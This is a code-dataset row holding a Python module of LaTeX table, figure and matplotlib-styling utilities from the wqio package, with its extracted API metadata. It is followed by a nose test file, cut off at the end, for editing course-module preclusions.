code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from textwrap import dedent
import os
import subprocess
import numpy
import pandas
from wqio.tests import helpers
from wqio.utils import numutils
def _sig_figs(x):
    """ Wrapper around `utils.sigFig` (n=3, tex=True) requiring only
    argument for the purpose of easily "apply"-ing it to a pandas
    dataframe.

    Fixes three significant figures and TeX output so the function can be
    passed directly as a ``float_format`` callable (see ``csvToTex``) or to
    ``DataFrame.apply``.
    """
    # Delegate to the project helper; only the value argument is exposed.
    return numutils.sigFigs(x, n=3, tex=True)
def refresh_index(df):
    """ Work around pandas block-manager quirks with deeply nested indexes.

    Rebuilds the (multi-)index by round-tripping it through ``reset_index``
    and ``set_index``. Dataframes without a MultiIndex are returned as-is.

    Parameters
    ----------
    df : pandas.DataFrame

    Returns
    -------
    pandas.DataFrame
    """
    # Nothing to do for a flat index -- return the frame untouched.
    if not isinstance(df.index, pandas.MultiIndex):
        return df
    return df.reset_index().set_index(df.index.names)
def get_level_position(df, levelname):
    """ Return the integer position of *levelname* among ``df``'s index levels.

    Parameters
    ----------
    df : pandas.DataFrame
        Dataframe whose (multi-)index is inspected.
    levelname : string
        Name of the index level to locate.

    Returns
    -------
    int
        Zero-based position of the level within the index.
    """
    level_names = numpy.array(df.index.names)
    # flatnonzero gives the indices where the name matches; take the first.
    matches = numpy.flatnonzero(level_names == levelname)
    return matches[0]
def sanitizeTex(texstring):
    """ Cleans up overly eager LaTeX renderings from pandas.

    Parameters
    ----------
    texstring : string
        The string of LaTeX code to be cleaned up.

    Returns
    -------
    sanitized : string
        Cleaned up LaTeX string.
    """
    # FIX: the original used non-raw strings such as "\$" and "\{", which are
    # invalid escape sequences (DeprecationWarning / W605). Raw strings below
    # are byte-identical in value. Order matters: "\\%" must be handled
    # before the bare "\\" -> \tabularnewline substitution.
    replacements = [
        (r"\\%", r"\%"),
        (r"\\", r"\tabularnewline"),
        (r"\$", "$"),
        (r"\_", "_"),
        ("ug/L", r"\si[per-mode=symbol]{\micro\gram\per\liter}"),
        (r"\textbackslashtimes", r"\times"),
        (r"\textbackslash", ""),
        (r"\textasciicircum", "^"),
        (r"\{", "{"),
        (r"\}", "}"),
    ]
    sanitized = texstring
    for old, new in replacements:
        sanitized = sanitized.replace(old, new)
    return sanitized
def csvToTex(
    csvpath,
    na_rep="--",
    float_format=_sig_figs,
    pcols=15,
    addmidrules=None,
    replaceTBrules=True,
    replacestats=True,
):
    """ Convert data in CSV format to a LaTeX table.

    Parameters
    ----------
    csvpath : string
        Full name and file path of the input data file.
    na_rep : string, default "--"
        How NA values should be written.
    float_format : callable (default = `_sig_figs`)
        Single input function that will return the correct
        representation of floating point numbers.
    pcols : int (default = 15)
        Width of the columns for the LaTeX table (in mm). When zero or
        negative, the column definitions are left untouched.
    addmidrules : string or list of strings, optional
        (List of) string(s) to be prefixed with "\\midrule".
    replaceTBrules : bool, default = True
        When True, replaces "\\toprule" and "\\bottomrule" with
        "\\midrule".
    replacestats : bool, default = True
        When True, the labels of statistics are cleaned up a bit (e.g.,
        "75%" -> "75th Percentile").

    Returns
    -------
    sanitized : string
        The sanitized LaTeX table source.
        (The original docstring claimed ``None``, but the function has
        always returned the rendered table.)
    """
    data = pandas.read_csv(csvpath, parse_dates=False, na_values=[na_rep])
    latex = data.to_latex(float_format=float_format, na_rep=na_rep, index=False)
    lines = []
    if pcols > 0:
        header, rest_of_file = latex.split("\n", maxsplit=1)
        # Rebuild the column spec: the first column gets an extra "l",
        # and every original column becomes a fixed-width "x{<pcols>mm}".
        header_sections = header.split("{")
        old_col_def = header_sections[-1][:-1]
        new_col_def = ""
        for position in range(len(old_col_def)):
            if position == 0:
                new_col_def = new_col_def + "l"
            new_col_def = new_col_def + "x{%smm}" % pcols
        lines.append(header.replace(old_col_def, new_col_def))
    else:
        # FIX: previously `lines`/`rest_of_file` were only defined inside
        # the `pcols > 0` branch, so any other value raised a NameError.
        rest_of_file = latex
    if replaceTBrules:
        rest_of_file = rest_of_file.replace("\\toprule", "\\midrule")
        rest_of_file = rest_of_file.replace("\\bottomrule", "\\midrule")
    if replacestats:
        rest_of_file = rest_of_file.replace("std", "Std. Dev.")
        rest_of_file = rest_of_file.replace("50\\%", "Median")
        rest_of_file = rest_of_file.replace("25\\%", "25th Percentile")
        rest_of_file = rest_of_file.replace("75\\%", "75th Percentile")
        rest_of_file = rest_of_file.replace("count", "Count")
        rest_of_file = rest_of_file.replace("mean", "Mean")
        rest_of_file = rest_of_file.replace("min ", "Min. ")
        rest_of_file = rest_of_file.replace("max", "Max.")
        # XXX: omg hack -- "max" -> "Max." mangles "Aluminum"; undo it.
        rest_of_file = rest_of_file.replace("AluMin.um", "Aluminum")
    if addmidrules is not None:
        if hasattr(addmidrules, "append"):
            for amr in addmidrules:
                rest_of_file = rest_of_file.replace(amr, "\\midrule\n%s" % amr)
        else:
            # BUG FIX: the original referenced `amr` here, which is not
            # defined in this branch (NameError for a string argument).
            rest_of_file = rest_of_file.replace(
                addmidrules, "\\midrule\n%s" % addmidrules
            )
    lines.append(rest_of_file)
    return sanitizeTex("\n".join(lines))
def csvToXlsx(csvpath, xlsxpath, na_rep="--", float_format=None):
    """ Convert data in CSV format to an Excel workbook.

    Parameters
    ----------
    csvpath : string
        Full name and file path of the input data file.
    xlsxpath : string
        Full name and file path of the output .xlsx file.
    na_rep : string (default = "--")
        How NA values should be represented.
    float_format : callable, optional
        Single input function that will return the correct
        representation of floating point numbers.

    Returns
    -------
    None
    """
    # Load the CSV (treating the NA marker symmetrically on input and
    # output) and hand it straight to pandas' Excel writer.
    frame = pandas.read_csv(csvpath, parse_dates=False, na_values=[na_rep])
    frame.to_excel(xlsxpath, float_format=float_format, na_rep=na_rep, index=False)
def makeTexTable(
    tablefile, caption, sideways=False, footnotetext=None, clearpage=False, pos="h!"
):
    """ Creates a table block for a LaTeX document. Does not add it to any
    file.

    Parameters
    ----------
    tablefile : string
        Name of the .tex file that actually contains the table.
    caption : string
        Caption/title that should be given to the table.
    sideways : bool (default = False)
        When True, a landscape table block is produced (and a
        "\\clearpage" is forced). Otherwise, the table is in portrait mode.
    footnotetext : string, optional
        Any text that should be added as a footnote.
    clearpage : bool (default = False)
        When True, a "\\clearpage" command is appended to the end of the
        table block.
    pos : string (default = "h!")
        LaTeX float position specification.

    Returns
    -------
    tablestring : string
        The table block text that can be -- but has not been -- added
        to a LaTeX document.
    """
    # Landscape tables always get their own page.
    tabletype = "sidewaystable" if sideways else "table"
    if sideways:
        clearpage = True
    clearpagetext = r"\clearpage" if clearpage else ""
    notes = "" if footnotetext is None else footnotetext
    template = dedent(
        r"""
        \begin{%s}[%s]
            \rowcolors{1}{CVCWhite}{CVCLightGrey}
            \caption{%s}
            \centering
            \input{%s}
        \end{%s}
        %s
        %s
        """
    )
    return template % (tabletype, pos, caption, tablefile, tabletype, notes, clearpagetext)
def makeLongLandscapeTexTable(df, caption, label, footnotetext=None, index=False):
    """ Create a multi-page landscape table for a LaTeX document.

    Parameters
    ----------
    df : pandas.DataFrame
        Dataframe to be turned into the table.
    caption : string
        Caption/title to be given to the table.
    label : string
        Unique identifier for references to table within LaTeX.
    footnotetext : string, optional
        Any text that should be added as a footnote.
    index : bool (default = False)
        Toggles the inclusion of the dataframe's index in the table.
        Default behavior omits it.

    Returns
    -------
    tablestring : string
        The table block text that can be -- but has not been -- added
        to a LaTeX document.
    """
    notes = "" if footnotetext is None else footnotetext
    # Keep only the data rows from pandas' rendering; the header and the
    # rules are rebuilt by the longtable template below.
    # NOTE(review): the [4:-3] slice assumes pandas' to_latex layout --
    # verify against the pinned pandas version.
    tabletexstring = df.to_latex(index=index, float_format=_sig_figs, na_rep="--")
    valuestring = "\n".join(tabletexstring.split("\n")[4:-3])

    def _render_header_cell(position, colname):
        # First column hugs the left edge; the rest get a fixed width.
        alignment = "l" if position == 0 else "p{16mm}"
        return r"\multicolumn{1}{%s}{%s}" % (alignment, colname.replace("%", r"\%"))

    dfcols = df.columns.tolist()
    align_chars = ["c"] * len(dfcols)
    align_chars[0] = "l"
    colalignment = "".join(align_chars)
    columns = " &\n ".join(
        _render_header_cell(pos, col) for pos, col in enumerate(dfcols)
    )
    template = dedent(
        r"""
        \begin{landscape}
        \centering
        \rowcolors{1}{CVCWhite}{CVCLightGrey}
        \begin{longtable}{%s}
            \caption{%s} \label{%s} \\
            \toprule
                %s \\
            \toprule
            \endfirsthead

            \multicolumn{%d}{c}
            {{\bfseries \tablename\ \thetable{} -- continued from previous page}} \\
            \toprule
                %s \\
            \toprule
            \endhead

            \toprule
                \rowcolor{CVCWhite}
                \multicolumn{%d}{r}{{Continued on next page...}} \\
            \bottomrule
            \endfoot

            \bottomrule
            \endlastfoot

        %s

        \end{longtable}
        \end{landscape}
        %s
        \clearpage
        """
    )
    return template % (
        colalignment,
        caption,
        label,
        columns,
        len(dfcols),
        columns,
        len(dfcols),
        valuestring,
        notes,
    )
def makeTexFigure(figFile, caption, pos="hb", clearpage=True):
    """ Create the LaTeX to include a figure in a document. Does not
    actually add it to any document.

    Parameters
    ----------
    figFile : string
        Name of the image (.pdf) file that actually contains the figure.
    caption : string
        Caption/title that should be given to the figure.
    pos : string (default = "hb")
        LaTeX float position specification.
    clearpage : bool (default = True)
        When True, a "\\clearpage" command is appended to the end of the
        figure block.

    Returns
    -------
    figurestring : string
        The figure block text that can be -- but has not been -- added
        to a LaTeX document.
    """
    clearpagetext = r"\clearpage" if clearpage else ""
    template = dedent(
        r"""
        \begin{figure}[%s] %% FIGURE
            \centering
            \includegraphics[scale=1.00]{%s}
            \caption{%s}
        \end{figure} %% FIGURE
        %s
        """
    )
    return template % (pos, figFile, caption, clearpagetext)
def processFilename(filename):
    """ Sanitizes a filename for LaTeX. DON'T feed it a full path.

    Removes every character that tends to break LaTeX commands
    (spaces, commas, "+", "$", "_", braces, "/", "&").

    Parameters
    ----------
    filename : string
        The name of the file to be sanitized.

    Returns
    -------
    sanitized : string
        Mutated filename without characters that might cause errors in
        LaTeX.

    Example
    -------
    >>> processFilename('FigureBenzo/Inzo_1')
    'FigureBenzoInzo1'
    """
    # One C-level pass with str.translate instead of chained replaces.
    return filename.translate(str.maketrans("", "", " ,+$_{}/&"))
def setMPLStyle(serif=False):
    """ Configure matplotlib's rcParams for LaTeX-rendered report figures.

    Parameters
    ----------
    serif : bool (default = False)
        When True, use a serif font stack (Utopia via the ``fourier``
        package); otherwise use a sans-serif stack (Helvetica +
        ``sansmath``).

    Returns
    -------
    None
    """
    # BUG FIX: ``matplotlib`` was referenced here but never imported
    # anywhere in this module, so calling this function raised NameError.
    import matplotlib

    if serif:
        fontfamily = "serif"
        preamble = [
            r"\usepackage{siunitx}",
            r"\sisetup{detect-all}",
            r"\usepackage{fourier}",
        ]
    else:
        fontfamily = "sans-serif"
        preamble = [
            r"\usepackage{siunitx}",
            r"\sisetup{detect-all}",
            r"\usepackage{helvet}",
            r"\usepackage{sansmath}",
            r"\sansmath",
        ]
    # NOTE(review): newer matplotlib expects "text.latex.preamble" to be a
    # single string rather than a list -- confirm against the pinned
    # matplotlib version before changing.
    style_dict = {
        "text.usetex": True,
        "font.family": [fontfamily],
        "font.serif": ["Utopia", "Palantino"],
        "font.sans-serif": ["Helvetica", "Arial"],
        "lines.linewidth": 0.5,
        "patch.linewidth": 0.5,
        "text.latex.preamble": preamble,
        "axes.linewidth": 0.5,
        "axes.grid": True,
        "axes.titlesize": 12,
        "axes.labelsize": 10,
        "xtick.labelsize": 10,
        "xtick.direction": "out",
        "ytick.labelsize": 10,
        "ytick.direction": "out",
        "grid.linewidth": 0.5,
        "legend.fancybox": True,
        "legend.numpoints": 1,
        "legend.fontsize": 8,
        "figure.figsize": (6.5, 3.5),
        "savefig.dpi": 300,
    }
    matplotlib.rcParams.update(style_dict)
class LaTeXDirectory(object):
    """ Context manager to help compile latex docs from python.

    Switches to the latex document's folder and remains there while
    inside the manager. The present working directory is restored once
    the context manager exits.

    Parameters
    ----------
    texpath : string
        The LaTeX source file or the directory in which it is found.
    """

    def __init__(self, texpath):
        # Remember where we started so __exit__ can restore it.
        self.home = os.getcwd()
        if os.path.isfile(texpath):
            # A file was given -- work in its containing directory.
            self.texpath = os.path.dirname(texpath)
        else:
            self.texpath = texpath

    def __enter__(self):
        os.chdir(self.texpath)
        return self

    def __exit__(self, *args):
        # Always restore the original working directory, even on error.
        os.chdir(self.home)

    def compile(self, texdoc, clean=False):
        """ Compile a LaTeX document inside the context manager

        Parameters
        ----------
        texdoc : string
            File name of a .tex file in the LaTeX directory
        clean : bool (default = False)
            When True, all of the non-PDF files resulting from compilation
            are removed. By default, they are left on the file system.

        Returns
        -------
        tex : int or None
            The return code of the compilation. If LaTeX is not
            available, None is returned.
        """
        if helpers.checkdep_tex() is not None:
            # use ``pdflatex`` to compile the document
            tex = subprocess.call(
                ["pdflatex", texdoc, "--quiet"],
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                shell=False,
            )
            if clean:
                # BUG FIX: ``glob`` was used below but never imported
                # anywhere in this module (NameError on cleanup).
                import glob

                extensions = ["aux", "log", "nav", "out", "snm", "toc"]
                for ext in extensions:
                    junkfiles = glob.glob("*.{}".format(ext))
                    for junk in junkfiles:
                        os.remove(junk)
        else:
            tex = None
        return tex
| [
"textwrap.dedent",
"wqio.utils.numutils.sigFigs",
"pandas.read_csv",
"os.getcwd",
"os.path.isfile",
"numpy.array",
"os.chdir",
"os.path.dirname",
"wqio.tests.helpers.checkdep_tex",
"subprocess.call",
"numpy.nonzero",
"os.remove"
] | [((338, 372), 'wqio.utils.numutils.sigFigs', 'numutils.sigFigs', (['x'], {'n': '(3)', 'tex': '(True)'}), '(x, n=3, tex=True)\n', (354, 372), False, 'from wqio.utils import numutils\n'), ((687, 714), 'numpy.array', 'numpy.array', (['df.index.names'], {}), '(df.index.names)\n', (698, 714), False, 'import numpy\n'), ((725, 759), 'numpy.nonzero', 'numpy.nonzero', (['(_names == levelname)'], {}), '(_names == levelname)\n', (738, 759), False, 'import numpy\n'), ((2622, 2685), 'pandas.read_csv', 'pandas.read_csv', (['csvpath'], {'parse_dates': '(False)', 'na_values': '[na_rep]'}), '(csvpath, parse_dates=False, na_values=[na_rep])\n', (2637, 2685), False, 'import pandas\n'), ((5234, 5297), 'pandas.read_csv', 'pandas.read_csv', (['csvpath'], {'parse_dates': '(False)', 'na_values': '[na_rep]'}), '(csvpath, parse_dates=False, na_values=[na_rep])\n', (5249, 5297), False, 'import pandas\n'), ((6862, 7048), 'textwrap.dedent', 'dedent', (['"""\n \\\\begin{%s}[%s]\n \\\\rowcolors{1}{CVCWhite}{CVCLightGrey}\n \\\\caption{%s}\n \\\\centering\n \\\\input{%s}\n \\\\end{%s}\n %s\n %s\n """'], {}), '(\n """\n \\\\begin{%s}[%s]\n \\\\rowcolors{1}{CVCWhite}{CVCLightGrey}\n \\\\caption{%s}\n \\\\centering\n \\\\input{%s}\n \\\\end{%s}\n %s\n %s\n """\n )\n', (6868, 7048), False, 'from textwrap import dedent\n'), ((8726, 9521), 'textwrap.dedent', 'dedent', (['"""\n \\\\begin{landscape}\n \\\\centering\n \\\\rowcolors{1}{CVCWhite}{CVCLightGrey}\n \\\\begin{longtable}{%s}\n \\\\caption{%s} \\\\label{%s} \\\\\\\\\n \\\\toprule\n %s \\\\\\\\\n \\\\toprule\n \\\\endfirsthead\n\n \\\\multicolumn{%d}{c}\n {{\\\\bfseries \\\\tablename\\\\ \\\\thetable{} -- continued from previous page}} \\\\\\\\\n \\\\toprule\n %s \\\\\\\\\n \\\\toprule\n \\\\endhead\n\n \\\\toprule\n \\\\rowcolor{CVCWhite}\n \\\\multicolumn{%d}{r}{{Continued on next page...}} \\\\\\\\\n \\\\bottomrule\n \\\\endfoot\n\n \\\\bottomrule\n \\\\endlastfoot\n\n %s\n\n \\\\end{longtable}\n \\\\end{landscape}\n %s\n \\\\clearpage\n 
"""'], {}), '(\n """\n \\\\begin{landscape}\n \\\\centering\n \\\\rowcolors{1}{CVCWhite}{CVCLightGrey}\n \\\\begin{longtable}{%s}\n \\\\caption{%s} \\\\label{%s} \\\\\\\\\n \\\\toprule\n %s \\\\\\\\\n \\\\toprule\n \\\\endfirsthead\n\n \\\\multicolumn{%d}{c}\n {{\\\\bfseries \\\\tablename\\\\ \\\\thetable{} -- continued from previous page}} \\\\\\\\\n \\\\toprule\n %s \\\\\\\\\n \\\\toprule\n \\\\endhead\n\n \\\\toprule\n \\\\rowcolor{CVCWhite}\n \\\\multicolumn{%d}{r}{{Continued on next page...}} \\\\\\\\\n \\\\bottomrule\n \\\\endfoot\n\n \\\\bottomrule\n \\\\endlastfoot\n\n %s\n\n \\\\end{longtable}\n \\\\end{landscape}\n %s\n \\\\clearpage\n """\n )\n', (8732, 9521), False, 'from textwrap import dedent\n'), ((10962, 11154), 'textwrap.dedent', 'dedent', (['"""\n \\\\begin{figure}[%s] %% FIGURE\n \\\\centering\n \\\\includegraphics[scale=1.00]{%s}\n \\\\caption{%s}\n \\\\end{figure} %% FIGURE\n %s\n """'], {}), '(\n """\n \\\\begin{figure}[%s] %% FIGURE\n \\\\centering\n \\\\includegraphics[scale=1.00]{%s}\n \\\\caption{%s}\n \\\\end{figure} %% FIGURE\n %s\n """\n )\n', (10968, 11154), False, 'from textwrap import dedent\n'), ((13521, 13532), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (13530, 13532), False, 'import os\n'), ((13544, 13567), 'os.path.isfile', 'os.path.isfile', (['texpath'], {}), '(texpath)\n', (13558, 13567), False, 'import os\n'), ((13704, 13726), 'os.chdir', 'os.chdir', (['self.texpath'], {}), '(self.texpath)\n', (13712, 13726), False, 'import os\n'), ((13787, 13806), 'os.chdir', 'os.chdir', (['self.home'], {}), '(self.home)\n', (13795, 13806), False, 'import os\n'), ((13596, 13620), 'os.path.dirname', 'os.path.dirname', (['texpath'], {}), '(texpath)\n', (13611, 13620), False, 'import os\n'), ((14413, 14435), 'wqio.tests.helpers.checkdep_tex', 'helpers.checkdep_tex', ([], {}), '()\n', (14433, 14435), False, 'from wqio.tests import helpers\n'), ((14522, 14635), 'subprocess.call', 'subprocess.call', (["['pdflatex', texdoc, '--quiet']"], {'stdout': 
'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'shell': '(False)'}), "(['pdflatex', texdoc, '--quiet'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, shell=False)\n", (14537, 14635), False, 'import subprocess\n'), ((14974, 14989), 'os.remove', 'os.remove', (['junk'], {}), '(junk)\n', (14983, 14989), False, 'import os\n')] |
'''
test_edit_preclusion_backend.py
Contains test cases for functions to edit preclusions.
'''
from nose.tools import assert_equal, assert_false, assert_true
from components import model
# HOW TO RUN NOSE TESTS
# 1. Make sure you are in cs-modify main directory
# 2. Make sure the path "C:\Python27\Scripts" is added in your environment variables
# 3. Enter in cmd: "nosetests test/"
# 4. Nose will run all the tests inside the test/ folder
class TestCode(object):
    '''
    This class runs the test cases for functions to edit preclusions.

    Each `test_*` method is guarded by a one-shot boolean flag: `setUp`
    drives the methods in a fixed order (flipping each flag to True
    afterwards) so that the bodies do not run a second time when nose
    discovers the methods on its own.
    '''

    def __init__(self):
        # Dummy target module that will receive the preclusions under test.
        self.test_module_code = "AA1111"
        self.test_module_name = "Dummy Module"
        self.test_module_desc = "Dummy Description"
        self.test_module_mc = 4
        self.test_module_status = "Active"
        # One-shot guards -- flipped to True once the matching test has run.
        self.no_preclude_to_one_preclude_tested = False
        self.no_preclude_to_no_preclude_tested = False
        self.no_preclude_to_multiple_preclude_tested = False
        self.preclude_to_one_preclude_tested = False
        self.preclude_to_no_preclude_tested = False
        self.preclude_to_multiple_preclude_tested = False
        self.edit_preclude_duplicate_tested = False
        self.edit_preclude_non_existent_tested = False
        self.edit_preclude_already_in_prereq = False
        self.edit_preclude_multiple_errors_tested = False
        # Dummy modules used as preclusion candidates.
        self.test_preclude_code = "BB1111"
        self.test_preclude2_code = "BB1112"
        self.test_preclude3_code = "BB1113"
        # Module code that is never inserted into the database.
        self.test_invalid_module_code = "ZZ1597"
        # Expected error messages from model.edit_preclusion.
        self.ERROR_MSG_MODULE_CANNOT_BE_ITSELF = "This module cannot be the same as target module"
        self.ERROR_MSG_MODULE_DUPLICATED = "There cannot be more than one instance of this module"
        self.ERROR_MSG_MODULE_DOESNT_EXIST = "This module does not exist"
        self.ERROR_MSG_MODULE_PRECLUSION_ALREADY_PREREQ = \
            "This module is a prerequisite of the target module"

    def setUp(self):
        '''
        Populate database and perform testing
        '''
        model.add_module(self.test_module_code, self.test_module_name, self.test_module_desc,
                         self.test_module_mc, self.test_module_status)
        model.add_module(self.test_preclude_code, self.test_module_name, self.test_module_desc,
                         self.test_module_mc, self.test_module_status)
        model.add_module(self.test_preclude2_code, self.test_module_name, self.test_module_desc,
                         self.test_module_mc, self.test_module_status)
        model.add_module(self.test_preclude3_code, self.test_module_name, self.test_module_desc,
                         self.test_module_mc, self.test_module_status)
        # Run every test exactly once, in a deterministic order.
        self.test_no_preclude_to_one_preclude()
        self.no_preclude_to_one_preclude_tested = True
        self.test_preclude_to_one_preclude()
        self.preclude_to_one_preclude_tested = True
        self.test_no_preclude_to_no_preclude()
        self.no_preclude_to_no_preclude_tested = True
        self.test_preclude_to_no_preclude()
        self.preclude_to_no_preclude_tested = True
        self.test_no_preclude_to_multiple_preclude()
        self.no_preclude_to_multiple_preclude_tested = True
        self.test_preclude_to_multiple_preclude()
        self.preclude_to_multiple_preclude_tested = True
        self.test_edit_preclude_duplicate_modules()
        self.edit_preclude_duplicate_tested = True
        self.test_edit_preclude_non_existent_modules()
        self.edit_preclude_non_existent_tested = True
        self.test_edit_preclude_already_in_prereq()
        self.edit_preclude_already_in_prereq = True
        self.test_edit_preclude_multiple_errors()
        self.edit_preclude_multiple_errors_tested = True

    def tearDown(self):
        '''
        Clean up the database after all test cases are ran
        '''
        model.delete_module(self.test_module_code)
        model.delete_module(self.test_preclude_code)
        model.delete_module(self.test_preclude2_code)
        model.delete_module(self.test_preclude3_code)

    def test_no_preclude_to_one_preclude(self):
        '''
        Tests editing preclusion on a module originally with no preclude
        to 1 preclude.
        '''
        if not self.no_preclude_to_one_preclude_tested:
            preclude_units_to_change_to = [self.test_preclude_code]
            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_true(outcome[0])
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_equal(len(preclude_info), 1)
            assert_equal(self.test_preclude_code, preclude_info[0][0])
            # Restore the clean state for the next test.
            model.delete_all_preclusions(self.test_module_code)
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(len(preclude_info) == 0)
        return

    def test_preclude_to_one_preclude(self):
        '''
        Tests editing preclusion on a module to 1 preclude.
        '''
        if not self.preclude_to_one_preclude_tested:
            model.add_preclusion(self.test_module_code, self.test_preclude_code)
            preclude_units_to_change_to = [self.test_preclude2_code]
            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_true(outcome[0])
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_equal(len(preclude_info), 1)
            assert_equal(self.test_preclude2_code, preclude_info[0][0])
            model.delete_all_preclusions(self.test_module_code)
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(len(preclude_info) == 0)
        return

    def test_no_preclude_to_no_preclude(self):
        '''
        Tests editing preclusion on a module originally with no preclude
        to no preclude.
        '''
        if not self.no_preclude_to_no_preclude_tested:
            preclude_units_to_change_to = []
            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_true(outcome[0])
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_true(len(preclude_info) == 0)
        return

    def test_preclude_to_no_preclude(self):
        '''
        Tests editing preclusion on a module to no preclude.
        '''
        if not self.preclude_to_no_preclude_tested:
            model.add_preclusion(self.test_module_code, self.test_preclude_code)
            preclude_units_to_change_to = []
            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_true(outcome[0])
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_true(len(preclude_info) == 0)
        return

    def test_no_preclude_to_multiple_preclude(self):
        '''
        Tests editing preclusion on a module originally with no preclude
        to multiple precludes.
        '''
        if not self.no_preclude_to_multiple_preclude_tested:
            preclude_units_to_change_to = [self.test_preclude_code,
                                           self.test_preclude2_code, self.test_preclude3_code]
            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_true(outcome[0])
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_equal(len(preclude_info), 3)
            assert_equal(self.test_preclude_code, preclude_info[0][0])
            assert_equal(self.test_preclude2_code, preclude_info[1][0])
            assert_equal(self.test_preclude3_code, preclude_info[2][0])
            model.delete_all_preclusions(self.test_module_code)
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(len(preclude_info) == 0)
        return

    def test_preclude_to_multiple_preclude(self):
        '''
        Tests editing preclusion on a module to multiple preclude.
        '''
        if not self.preclude_to_multiple_preclude_tested:
            model.add_preclusion(self.test_module_code, self.test_preclude_code)
            preclude_units_to_change_to = [self.test_preclude_code,
                                           self.test_preclude2_code, self.test_preclude3_code]
            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_true(outcome[0])
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_equal(len(preclude_info), 3)
            assert_equal(self.test_preclude_code, preclude_info[0][0])
            assert_equal(self.test_preclude2_code, preclude_info[1][0])
            assert_equal(self.test_preclude3_code, preclude_info[2][0])
            model.delete_all_preclusions(self.test_module_code)
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(len(preclude_info) == 0)
        return

    def test_edit_preclude_duplicate_modules(self):
        '''
        Tests editing preclusion on a module to precludes with duplicates,
        note: this test case should fail to edit.
        '''
        if not self.edit_preclude_duplicate_tested:
            model.add_preclusion(self.test_module_code, self.test_preclude_code)
            preclude_units_to_change_to = [self.test_preclude2_code,
                                           self.test_preclude2_code]
            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_false(outcome[0])
            error_list = outcome[1]
            assert_equal(len(error_list), 1)
            assert_equal(error_list[0],
                         [self.test_preclude2_code, self.ERROR_MSG_MODULE_DUPLICATED])
            # The failed edit must leave the original preclusion untouched.
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_equal(self.test_preclude_code, preclude_info[0][0])
            model.delete_all_preclusions(self.test_module_code)
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(len(preclude_info) == 0)

    def test_edit_preclude_non_existent_modules(self):
        '''
        Tests editing preclusion on a module to precludes which does
        not exist, note: this test case should fail to edit.
        '''
        if not self.edit_preclude_non_existent_tested:
            model.add_preclusion(self.test_module_code, self.test_preclude_code)
            preclude_units_to_change_to = [self.test_preclude2_code,
                                           self.test_invalid_module_code]
            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_false(outcome[0])
            error_list = outcome[1]
            assert_equal(len(error_list), 1)
            assert_equal(error_list[0],
                         [self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST])
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_equal(self.test_preclude_code, preclude_info[0][0])
            model.delete_all_preclusions(self.test_module_code)
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(len(preclude_info) == 0)
            # Test another form: invalid module listed first.
            model.add_preclusion(self.test_module_code, self.test_preclude_code)
            preclude_units_to_change_to = [self.test_invalid_module_code,
                                           self.test_preclude2_code]
            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_false(outcome[0])
            error_list = outcome[1]
            assert_equal(len(error_list), 1)
            assert_equal(error_list[0],
                         [self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST])
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_equal(self.test_preclude_code, preclude_info[0][0])
            model.delete_all_preclusions(self.test_module_code)
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(len(preclude_info) == 0)
        return

    def test_edit_preclude_already_in_prereq(self):
        '''
        Tests editing preclusion on a module to precludes which already
        exists as a prerequisite to that module.
        Note: this test case should fail to edit.
        '''
        # BUG FIX: this previously checked `edit_preclude_non_existent_tested`,
        # which is already True by the time setUp reaches this test, so the
        # body below was silently skipped. Guard on this test's own flag.
        if not self.edit_preclude_already_in_prereq:
            model.add_prerequisite(self.test_module_code, self.test_preclude_code,
                                   0)
            preclude_units_to_change_to = [self.test_preclude_code]
            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_false(outcome[0])
            error_list = outcome[1]
            assert_equal(len(error_list), 1)
            assert_equal(error_list[0],
                         [self.test_preclude_code, self.ERROR_MSG_MODULE_PRECLUSION_ALREADY_PREREQ])
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_true(len(preclude_info) == 0)
            model.delete_all_prerequisites(self.test_module_code)
            prereq_info = model.get_prerequisite(self.test_module_code)
            assert_true(len(prereq_info) == 0)

    def test_edit_preclude_multiple_errors(self):
        '''
        Tests editing preclusion on a module to precludes with multiple
        errors.
        Note: this test case should fail to edit.
        '''
        if not self.edit_preclude_multiple_errors_tested:
            model.add_preclusion(self.test_module_code, self.test_preclude_code)
            preclude_units_to_change_to = [self.test_module_code,
                                           self.test_invalid_module_code]
